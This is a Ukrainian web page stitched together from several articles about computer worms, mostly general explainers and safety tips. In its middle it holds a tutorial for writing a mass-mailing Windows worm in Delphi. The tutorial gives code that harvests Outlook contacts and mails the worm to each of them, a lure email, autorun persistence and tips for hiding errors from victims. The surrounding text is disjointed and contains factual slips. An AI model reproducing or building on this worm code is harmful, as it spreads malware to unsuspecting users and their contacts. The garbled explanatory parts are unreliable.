Мережевий хробак. Комп'ютерний черв'як Комп'ютерний черв'як

Черв'як, у певному сенсі, схожий на комп'ютерні віруси. Ця програма також здатна до багаторазового розмноження в пам'яті ПК, проте вона не завжди здатна порушувати працездатність апаратури. Хробак діє потай, і виявити його не так легко. Він дається взнаки тоді, коли починають зависати деякі проги або сама операційна система.

При цьому черв'як використовує всі доступні ресурси ПК, у тому числі, і програмні.

Зазвичай черв'як потрапляє в пам'ять комп'ютера у вигляді одиночної програми. На відміну від вірусів, ця програма не прикріплюється до окремих програм. Найчастіше, підчепити черв'яка можна через інтернет.

Найвідоміші віруси-хробаки. Типовий приклад -"Code Read". Це найпростіший інтернет-хробак, яким заражає комп'ютери з програмним забезпеченням від Microsoft. Саме цей черв'як уже встиг заразити понад 6 мільйонів серверів у всьому світі. Після влучення в пам'ять, Code Read може запустити атаку на конкретний комп'ютер у мережі, використовуючи його унікальну IP-адресу. Трохи пізніше з'явились нові представники програм загону «Червь» - «Code Reed II». Це більш агресивний побратим, в якому збереглися аналогічні слабкості та принцип дії. У його ядрі міститься троян, здатний повністю підпорядкувати собі операційну систему.. (Докладніше про трояна ви можете)Не можна не згадати і про NIMDA

Код цього додатка є комбінацією трояна і звичайного хробака

. Відомо, що він швидко розмножується і вже встиг зіпсувати настрій понад 8 мільйонів адміністраторів мереж.

• Як захистити свій ПК від вірусу?
• використовувати менше неліцензійних програм.
• не слід вводити системні команди під диктування невідомого «помічника».

Пам'ятайте, що жоден антивірус не забезпечує стовідсотковий рівень захисту.

Існує ще маса можливостей захиститися від вірусів, тут описані лише найпростіші та найефективніші. Щоб вірус не проник у ПК, рекомендується встановити антивірус і частіше оновлювати вірусні основи.

Сучасний черв'як може розвиватися і ставати хитрішим, тому не можна сподіватися лише антивірус. Згодом, віруси стають сильнішими, а виявити їх не вдається.

Інші засоби захисту.

Windows має вбудовану систему захисту – брандмаузер, здатний дати відсіч віртуальним хробакам.Крім того, фахівці рекомендують використовувати перевірені програми, а не завантажувати все поспіль. Класичні віруси можна нейтралізувати за допомогою Firewall Plus – найпростішої програми, орієнтованої на боротьбу з троянами, клавіатурними шпигунами та іншою нечистю. Пам'ятайте, що «всесвітнє павутиння» - улюблене місце для хробаків, тому не відкривайте електронні листи від невідомих осіб із прикріпленими файлами.

Насамкінець.

Ще одна важлива порада. Шкідливий код створений для того, щоб завдавати шкоди файлам та особистим даним. Тому, на окремому носії завжди повинна бути запасна копія даних.Слід пам'ятати, більшість черв'яків потрапляє до ПК через архіви з безкоштовними програмами. І пам'ятайте, що спам може принести непроханого гостя у вигляді електронного листа з ZIP-архівом.

Сьогодні я опишу принцип роботи мережного вірусу. Тема, як ти зрозумів, дуже актуальна, оскільки 70% особисто моєї скриньки завжди буває забита вірусами найрізноманітнішого штибу
- від дрібних, але злісних VBS-хробаків до півторамегових творів молодших школярів 🙂 Адже вони не знають про існування WinAPI 🙂

Для проникнення комп'ютер віруси можуть або використовувати баги в ПО користувача (VBS+Outlook= love:)) або- баги у голові самого пользователя. Розглянемо приклад такого вірусного листа:

Subj: Прикол
Вітання! Тримай крутий прикол, який я тобі (чи не тобі, не пам'ятаю :)) Обіцяв. Але все одно тримай. Не бійся, по-справжньому він нічого не форматує!
Перевірити не забудь, параноїк 🙂
Успіхів!
Attach: fake_format.exe

Ну так от: кожен ламуристий інтернетчик посилає своїм друзям приколи постійно, і, відповідно, не дуже пам'ятає, кому чого обіцяв; повідомлення про "несправжнє форматування" перемикає мізки жертви в русло приколів, а сліпа віра в антивіруси
- добиває 🙂 Нагадаю - описані мною алгоритми не визначаються жодними webами, avp та іншими бійцями.

Коротше, мені вже самому захотілося запустити цей веселенький прикол. Запускаю 🙂

Error... intel pentium 5 not found!

Ой.. Начебто не працює? Ні, не вгадав 🙂 Насправді вірус відразу переніс своє тіло на хард до жертви, записався в автозавантаження, і тепер тусуватиметься в оперативці (хінт: на медичному жаргоні "оперативка" - це ОПЕРАТИВНА ХІРУРГІЯ, так що будь обережний;)) жертви за принципом, описаним мною у статті "резидентний вірус своїми руками". Тільки ось перевірятиме він не запуск файлів, а підключення до мережі інтернет 🙂 (у вихіднику це буде процедура IsOnline, так, на майбутнє;)). Втім, одночасно
моніторити запуск файлів тобі ніхто не заважає
- це все-таки вірус, хоч і сетевик. Тому в логіку включу процедуру InfectFile. Таким чином, ми будемо використовувати такі функції та процедури:

ISONLINE - перевірка з'єднання з інетом
SENDVIRUS - здогадайся із трьох разів 😉
GETMAILS - отримуємо адреси з AddresBook аутглюку
INFECTFILES - 🙂
WORKMEMORY - майже те саме, що у минулій статті, але з модифікаціями.

КОДІНГ

До початку власне кодига цього разу необхідні будуть довгі попередні ласки 🙂 Пояснюю чому: для читання адресної книги ми звертатимемося до аутлуку за міжпрограмним інтерфейсом, а для цього нам нехило отримати його type library. Ось і роби: projecta import type library, і шукай там ... правильно, Outlook express v.9 або який там у тебе стоїть. Дев'ятою вважається версія, якщо не помиляюся, із Office2k. Імпортував? Що означає "ні в списку"? Та гаразд, буває. Шукай вручну
- у каталозі з офісом є файл msoutl.olb. Це вона 😉 Тепер у розділ uses пиши outlook_tlb і матимеш доступ до найінтимніших місць адресної книги 🙂 Ой, якийсь я сьогодні стурбований 😉
Загалом процедура потрошення адресбука має виглядати як:

uses
ComObj, outlook_tlb,
Forms;
....
Procedure GETMAILS;
var
MyFolder, MSOutlook, MyNameSpace, MyItem: Variant; s: string;
num, i: Integer;
mails: array of string;

begin
MSOutlook:= CreateOleObject("Outlook.Application");
MyNameSpace:= MSOutlook.GetNameSpace("MAPI");
MyFolder:= MyNamespace.GetDefaultFolder(olFolderContacts);
SetLength (mails, MyFilder.Items.Count);
for i:= 1 to MyFolder.Items.Count do
begin
MyItem:= MyFolder.Items[i];
mails[i]:= myitem.email1addres;
end;

Ну як, потішило тебе написане? Ги, далі буде лише гірше. Тому що надсилання вірусу буде на чистому API. А це, як каже Horrific: "те саме, що ручний секс. Ефект є в обох випадках, але його доводиться довго добиватися і немає такого кайфу" 🙂 Ну
то що я тут написав? Uses Comobj дозволяє нам працювати з технологією COM; далі ми лише створюємо OLE об'єкт аутлука, і циклічно з'ясовуємо у нього список емайлів. Якщо тобі хочеться з'ясувати ще щось
- це теж реально, читай доки - вони кермо. Хоч і англійською. Список емайлів пишеться в динамічний масив із рядків. Його буде використовувати функція SendVirus. Ось ця:

функція SendVirus(const RecipName, RecipAddress, Subject, Attachment: string): Boolean;
var
MapiMessage: TMapiMessage;
MapiFileDesc: TMapiFileDesc;
MapiRecipDesc: TMapiRecipDesc;
i: integer;
s: string;
begin
with MapiRecipDesc ​​do begin
ulRecerved:= 0;
ulRecipClass:= MAPI_TO;
lpszName:= PChar(RecipName);
lpszAddress: = PChar (RecipAddress);
ulEIDSize:= 0;
lpEntryID:= nil;
end;

with MapiFileDesc do begin
ulReserved:= 0;
flFlags:= 0;
nPosition:= 0;
lpszPathName:= PChar(Attachment);
lpszFileName:= nil;
lpFileType:= nil;
end;

with MapiMessage do begin
ulReserved:= 0;
lpszSubject:= nil;
lpszNoteText:= PChar(Subject);
lpszMessageType:= nil;
lpszDateReceived:= nil;
lpszConversationID:= nil;
flFlags:= 0;
lpOriginator:= nil;
nRecipCount: = 1;
lpRecips:= @MapiRecipDesc;
if length(Attachment) > 0 then begin
nFileCount: = 1;
lpFiles:= @MapiFileDesc;
end else begin
nFileCount: = 0;
lpFiles:= nil;
end;
end;

Result:= MapiSendMail(0, 0, MapiMessage, MAPI_DIALOG
or MAPI_LOGON_UI or MAPI_NEW_SESSION, 0) = SUCCESS_SUCCESS;
end;

Ти не набряк, поки це читав? Піди, попий пивка, бо нічого не зрозумієш.
Випив? Я теж 😉 Добре, продовжуємо. Юзатимеш так:

For i:= 1 to length (mails) do
begin
SendVirus ("",mails[i],"pricol","..");
end;

Тут ми використовуємо функції uses MAPI, тому не забудь його оголосити. Коротше, це
- низькорівнева робота із поштою. А для роботи з поштою, як ти знаєш, треба мати а)
email одержувача б) текст листа в) аттач. Ось я й роблю:
MapiRecipDesc ​​- описую одержувача, MapiFileDesc - аттач,
тобто. наш вірус, MapiMessage – це повідомлення, потім я його командою MapiSendMail відправлю у велике життя 😉 Ну, не так це виявилося і складно. Головне зрозуміти, що твій найбільший друг
- це не c:\porno, а win32.hlp 🙂

Як же тепер усе це словоблудство покласти в сувору логіку вірусу? Сам розберешся, я тобі вже 2 статті поспіль про це довбаю. І взагалі, я вчора відзначав день народження моєї дівчини, тепер у мене злегка тріщить голова. Ну гаразд, почуття обов'язку сильніше. Just Do It:
Першим рядком перевіряєш ім'я файлу, звідки ти стартував. Якщо
pricol.exe - значить CopyFile до вин 🙂 А якщо стартанув з віндового каталогу
- то циклічно перевіряй підключення до всесвітньої мережі 😉. Перевіряємо:

функція IsOnline: Boolean;
var
RASConn: TRASConn;
dwSize,dwCount: DWORD;
begin
RASConns.dwSize:= SizeOf(TRASConn);
dwSize:= SizeOf(RASConns);
Res:=RASEnumConnectionsA(@RASConns, @dwSize, @dwCount);
Result:= (Res = 0) and (dwCount > 0);
end;

Так. Якщо все шляхом, то вперед - тряси адресну книгу і розсилайся. Тут є дві хитрощі. Якщо твоє ім'я
pricol.exe – негайно перевіряй з'єднання. Можливо, користувач перевіряє пошту онлайн. Тож наші шанси на розсилку сильно зростуть. До другої хитрості ти вже допер сам,
зокрема, при описаному мною розкладі ти весь час відправляти одному й тому самому користувачеві однакові листи, лише оскільки його не стерли з адресбука. Отже, всі відпрацьовані адреси записуй у логфайл і постійно з ним звіряйся. Начебто все. Хоча ні. Не забувай помилконебезпечні фрагменти коду укладати у try.except. І ставити ключ ($ D-). Бо якщо користувач раптом зловить помилку на кшталт " " FUCK " is not valid integer value " , він щось запідозрить.

ВИСНОВОК

Ця остання стаття про віруси, налагоджені під windows 9x. Нещодавно я форматнув гвинт і поставив Windows XP Professional, тому наступні приклади будуть вже під нього. А ти вже можеш потихеньку купувати Delphi 7, оскільки я свої шости десь посіяв, і зараз сиджу взагалі голий 🙂 Купувати буду відповідно сьомі

Наступна стаття, напевно, буде присвячена стеганографії та її практичної реалізації.

Привіт всім.

Хочу розповісти вам про те, що є вірус хробака. Я називаю його вірусом, щоб усім одразу стало зрозуміло, про що йтиметься. Проте між цими поняттями є різниця. Яка? Про це ви теж прочитаєте у моїй статті.

Також я розповім вам, як поширюються мережеві черв'яки, яких видів вони бувають і як із ними можна боротися.

Черв'як: роз'яснення та виникнення

У комп'ютерній області даний термін має на увазі тип шкідливої ​​програми, яка самостійно розноситься по інтернету або локальним мережам. Її на відміну від звичайного вірусу у тому, що вона заражає інші файли, щоб завдати шкоди, лише копіює себе. Але така поведінка теж може спричинити чимало проблем. Далі ви зрозумієте, що я маю на увазі.

Історія появи

Вперше роботи із застосування хробаків у розподілених обчисленнях провели Йон Хупп та Джон Шоч у 1978 році на базі дослідницької лабораторії Xerox у Пало-Альто.

Перший відомий приклад

Не можна не згадати «Черв'я Морріса» - одного з перших і найвідомішого хробака, названого на честь свого творця Роберта Морріса-молодшого. На момент написання проги (1988) він навчався в Корнеллському Університеті. Уявляєте, робота аспіранта проникла приблизно в 6200 ПК (близько 10% від загальної кількості машин з доступом до Інтернету на той час).

Чим небезпечний був цей хробак? Найчастішим створенням своїх копій. Річ у тім, що Роберт Морріс вказав замалий проміжок часу між утворенням клонів. Внаслідок цієї, здавалося б, незначної помилки, вірус вичерпував усі ресурси комп'ютерів, що призводило до їхньої відмови від обслуговування. У результаті він завдав загальних збитків на суму 96,5 мільйонів доларів.

Способи розповсюдження

Щоб потрапити в нашу систему, черв'як іде на такі хитрощі:

1. Виявлення недоліків у структурі та адмініструванні наявного у нас програмного забезпечення. До речі Черв Морріса скористався «пробілами» у поштовій службі Sendmail, сервісі Finger та обчислював пароль за допомогою словника. Примітно, що розповсюдження таких шкідників не потрібно навіть контролювати - вони працюють в автономному режимі.
2. Чи чули про соціальну інженерію? Вона передбачає управління поведінкою без допомоги технічних засобів. Тобто її методи ґрунтуються на людському факторі.
   Так ось, другий спосіб поширення черв'яків полягає у використанні даної інженерії. Це означає, що ми самі запускаємо шкідливу прогу. Звичайно, ми про це не підозрюємо, адже вона маскується під звичайний софт.
   Наприклад, VBS.LoveLetter користувався тим, що в Outlook Express розширення файлів приховані, тому він ні в кого не викликає підозр. Такий механізм популярний у розсилках спаму, соц. мережах та ін.

Швидкість, з якою поширюються шкідники, залежить від різних обставин: топології мережі, способів пошуку вразливостей, наскільки швидко вони вміють створювати своїх клонів і т.д.

Взагалі вони часто намагаються проникнути в комп'ютери випадковим чином. Більше того, сучасні антивіруси їх швидко виявляють, проводять роботу над помилками та роблять систему невразливою.

Види комп'ютерних хробаків

Залежно від способу поширення виділяють такі різновиди черв'яків:

Інша відмінність

Враховуючи принцип дії, черв'яків ще можна поділити на такі групи:

• Резидентні, які не здатні завантажуватися як прості файли, тому потрапляють лише в оперативну пам'ять та інфікують ПЗ, що функціонує. Таким чином, їх можна усунути простим перезавантаженням комп'ютера, оскільки ця дія скидає ОЗУ.
• Шкідники, які завантажуються як виконуваних файлів, більш небезпечні. Після зараження пам'яті вони залишають код на жорсткому диску, щоб активізуватися навіть після перезапуску ПК. Вони можуть здійснювати це за допомогою створення спеціальних ключів у реєстрі Windows. З таким неподобством можна боротися лише антивірусами.

Як бачите вірус хробака це задоволена таки не невинна штука.

Зараження комп'ютера шкідливими програмами – проблема, з якою час від часу стикається будь-який користувач, підключений до Інтернету і копіює дані із зовнішніх носіїв. Подібного роду «інфекція» може прийти як завгодно, якщо комп'ютер із якоїсь причини недостатньо захищений. Знання особливостей різних програм, що дестабілізують систему ПК, допоможе вчасно їх виявити і швидко їх позбутися.

Що спільного у зараженого комп'ютера із хворою людиною?

Відомо, що людина найчастіше занедужує під впливом вірусів - такого роду інфекція вражає конкретний орган або систему і послаблює організм, вражаючи його клітини. Вірус певною мірою живиться клітинами людини – і приблизно так само поводиться шкідлива комп'ютерна програма: вона захоплює і «з'їдає» файли, вписуючись у їхній програмний код. Уражені вірусом клітини відмирають, а зіпсовані файли комп'ютера не підлягають відновленню.

І віруси, і черв'яки мають на меті дестабілізувати роботу одного комп'ютера або цілої мережі. Ось кілька найпоширеніших способів передачі такої «зарази»:

1. Електронною поштою, якщо відкрити лист із підозрілим вкладенням.
2. Відкривши посилання на сумнівний сайт (такі посилання часто трапляються на різних ресурсах для дорослих).
3. У файлообмінних мережах.
4. На драйвері ОС.

Комп'ютерний вірус як небезпечна іграшка

Цей тип деструктивних програм спочатку був нешкідливим - їх автори вигадали віруси ... для гри. За її умовами, віруси розсилалися друзям, щоб подивитися, як багато власних копій може зробити така програма. Той гравець, якому вдавалося повністю заповнити чужий комп'ютер, оголошувався переможцем. Але потім віруси почали створювати з деструктивними цілями, а саме – знищення даних на комп'ютері та поступове виведення з ладу операційної системи.

Після того, як вірус проник на комп'ютер, має відбутися його активація – для цього заражений об'єкт повинен отримати керування. У зв'язку з цим розрізняють два типи вірусів:

1. Завантажувальні (захоплюють сектори постійних та змінних носіїв).
2. Файлові (захоплюють файли).

Активувавши вірус шукає схожі об'єкти. Наприклад, файловий вірус «з'їдає» один документ Word і продовжує переходити на інші документи, поки не знищить їх повністю - або не буде виявлений.

Зазначимо, що віруси мають досить обмежену спеціалізацію - якщо вони розраховані на один тип файлів, то вони будуть заражати подібні об'єкти. Також віруси можуть створювати для певних ОС: наприклад, шкідлива програма, написана для Windows, не діятиме на Linux.

Мережеві черви: пожирачі пам'яті

Якщо комп'ютер без видимих ​​причин раптом почав "гальмувати", окремі програми повільно запускаються, а система часто зависає, то, швидше за все, вона заражена мережевим хробаком, який зумів обійти систему захисту або скористався якоюсь лазівкою в ОС.

На відміну від вірусу, черв'як не цікавиться даними та ніяк не зачіпає файли: він просто розмножується, копіюючи самого себе та заповнюючи вільне місце на диску У разі невчасного виявлення черв'яка, підвиснути може комп'ютерна мережа цілої організації, оскільки ця шкідлива програма живиться пам'яттю. Крім того, хробак може витягувати багато трафіку в інтернеті.

Як уберегтися від вірусів та черв'яків?

Найдієвіший спосіб убезпечити свій комп'ютер від мережевої «зарази» – встановити легальну і дорогу систему захисту, яка блокуватиме будь-які небезпечні програми при спробі проникнути в ОС.
Але оскільки фантазії хакерів немає межі і вони постійно плодять нових вірусів та черв'яків, націлених на ігнорування захисту, потрібно пам'ятати про елементарні правила:

• Не відкривати листи від невідомих відправників із дивними темами та вкладеними файлами з розширенням.exe.
• Користуватися надійними поштовими системами, які фільтрують підозрілі повідомлення.
• Відмовитись від скачування нелегального контенту на сумнівних сайтах.
• Бути обережними з торентами.
• Додатково перевіряти знімні носії, які підключаються до комп'ютера.

Ці нескладні правила допоможуть вам зберегти свій комп'ютер від небажаних програм.

Основним ознакою, яким черв'яки різняться між собою, є спосіб поширення черв'яка. Іншими ознаками відмінності є способи запуску копії хробака на комп'ютері, що заражається, методи впровадження в систему, а також поліморфізм , «стелс» та інші характеристики, притаманні і іншим типам шкідливого програмного забезпечення (вірусам і троянським програмам).

Види хробаків

Залежно від шляхів проникнення в операційну систему черв'яка поділяються на:

• Поштові хробаки(Mail-Worm) - черв'яки, які розповсюджуються у форматі електронних листів. При цьому черв'як відсилає або свою копію у вигляді вкладення в електронний лист, або посилання на свій файл, розташований на якомусь мережевому ресурсі (наприклад, URL-адреса на заражений файл, розташований на зламаному або хакерському веб-сайті). У першому випадку код черв'яка активізується при відкритті (запуску) зараженого вкладення, у другому - при відкритті посилання на заражений файл. В обох випадках ефект однаковий – активізується код хробака.
• IM черв'яки(IM-Worm) - черв'яки, що використовують інтернет-пейджери. Відомі комп'ютерні черв'яки даного типу використовують єдиний спосіб розповсюдження - розсилку на виявлені контакти (з контакт-листа) повідомлень, що містять URL-адресу на файл, розташований на якому-небудь веб-сервері. Цей прийом практично повністю повторює аналогічний спосіб розсилки, що використовується поштовими хробаками.
• P2P черв'яки(P2P-Worm) - черв'яки, що розповсюджуються за допомогою пірінгових (peer-to-peer) файлообмінних мереж. Механізм роботи більшості подібних черв'яків досить простий - для впровадження в P2P-мережу черв'яка досить скопіювати себе в каталог обміну файлами, який зазвичай розташований на локальній машині. Всю решту роботи з поширення вірусу P2P-мережа бере на себе - при пошуку файлів у мережі вона повідомить віддалених користувачів про цей файл і надасть весь необхідний сервіс для завантаження файлу із зараженого комп'ютера. Існують складніші P2P-хробаки, які імітують мережевий протокол конкретної файлообмінної системи і на пошукові запити відповідають позитивно - при цьому черв'як пропонує для скачування свою копію.
• Черв'яки в IRC-каналах(IRC-Worm). У даного типу черв'яків, як і у поштових черв'яків, існують два способи поширення черв'яка по IRC-каналах, що повторюють способи, описані вище. Перший полягає у надсиланні URL-посилання на копію хробака. Другий спосіб - відсилання зараженого файлу якомусь користувачеві мережі. При цьому користувач повинен підтвердити прийом файлу, потім зберегти його на диск і відкрити (запустити на виконання).
• Мережеві черв'яки(Net-Worm) - інші мережеві черви, серед яких має сенс додатково виділити інтернет-хробаки та LAN-хробаки
  • Інтернет черв'яки- черв'яки, що використовують для розповсюдження протоколи Інтернет. Переважно цей тип хробаків поширюється з використанням неправильної обробки деякими програмами базових пакетів стека протоколів TCP/IP.
  • LAN-хробаки- черв'яки, що розповсюджуються за протоколами локальних мереж